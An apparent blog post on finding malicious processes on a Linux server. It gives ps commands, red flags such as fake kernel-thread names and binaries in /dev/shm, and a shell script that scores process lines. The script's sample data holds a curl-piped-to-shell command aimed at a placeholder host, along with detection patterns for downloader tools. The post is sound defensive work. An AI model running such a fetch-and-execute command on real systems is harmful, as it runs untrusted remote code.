How I Spot a Suspicious Process on My Linux Server (Before It Does Damage)
One strange PID. One weird name. That’s all it takes for a compromise to start — silently.
Over the years, I’ve learned to read a process list like a detective. In this blog, I’ll share exactly what I look for when I suspect a Linux server is misbehaving — and how you can spot malicious processes before they take control.
🧠 Step 1: Always Check With ps, Not Just top
Why? Because top refreshes live and can miss fast-spawning processes.
```shell
ps aux --sort=-%cpu | head
ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head
```
✅ What I look for:
- bash or sh running under unusual users
- Commands like curl, wget, python inside a shell
- Anything running from /tmp or /dev/shm
🧪 Step 2: Look for Process Names That Try to Blend In
Attackers love hiding in plain sight. They’ll name things like:
- [kworker/0:1]
- sshd (but fake)
- cron (but not started by root)
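To turn the Step 1 and Step 2 checks into something repeatable, here is an added example (my own, not from the original post) that scores `ps` output against those heuristics. It assumes the `ps -eo pid,ppid,user,cmd --no-headers` column layout, a hypothetical list of service accounts under which an interactive shell is unusual, and that a bare `sshd` token (no path, no `sshd: user` form) is an impostor; the sample input is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example (not from the original post). Applies the Step 1/Step 2
# heuristics to lines in the format of `ps -eo pid,ppid,user,cmd --no-headers`
# read on stdin and prints "pid<TAB>reasons<TAB>cmd" for each hit. The
# service-account list and the bare-"sshd" rule are assumptions to tune.
SERVICE_USERS="www-data nobody daemon mysql postgres redis nginx apache"

flag_suspicious() {
    while read -r pid ppid user cmd; do
        reasons=""
        first=${cmd%% *}; base=${first##*/}   # argv[0] and its basename
        # Step 2: real kernel threads are children of kthreadd (PID 2).
        case "$first" in
            \[*\]) [ "$ppid" = 2 ] || [ "$pid" = 2 ] || reasons="$reasons fake-kernel-thread" ;;
        esac
        # Step 2: cron is started by root; a bare "sshd" token is assumed fake
        # (real sshd shows a full path or the "sshd: user ..." form).
        case "$base" in
            cron|crond) [ "$user" = root ] || reasons="$reasons cron-not-root" ;;
        esac
        [ "$cmd" != sshd ] || reasons="$reasons bare-sshd"
        # Step 1: binaries executing from world-writable scratch directories.
        case "$first" in
            /tmp/*|/dev/shm/*|/var/tmp/*) reasons="$reasons scratch-dir-exec" ;;
        esac
        # Step 1: a shell under a service account, or one used only to run curl/wget/python.
        case "$base" in
            sh|bash|dash)
                for su in $SERVICE_USERS; do
                    [ "$user" != "$su" ] || reasons="$reasons shell-as-service-user"
                done
                case "$cmd" in
                    *" -c "*curl*|*" -c "*wget*|*" -c "*python*) reasons="$reasons shell-spawns-downloader" ;;
                esac ;;
        esac
        if [ -n "$reasons" ]; then printf '%s\t%s\t%s\n' "$pid" "${reasons# }" "$cmd"; fi
    done
}

# Constructed sample in ps format (not captured from a real host).
sample_ps() {
    cat <<'EOF'
 2001     2 root     [kworker/0:1]
 1337   900 www-data [kworker/0:1]
 2100     1 nobody   crond
 2200  1500 www-data /bin/sh -c curl -s http://example.invalid/a | sh
 2300     1 root     /dev/shm/.x -p 4444
 2400  2300 root     sshd
EOF
}
sample_ps | flag_suspicious   # live: ps -eo pid,ppid,user,cmd --no-headers | flag_suspicious
```

Every hit still needs a human look at `/proc/<pid>/exe` and the parent chain before you act on it; the script only narrows the list.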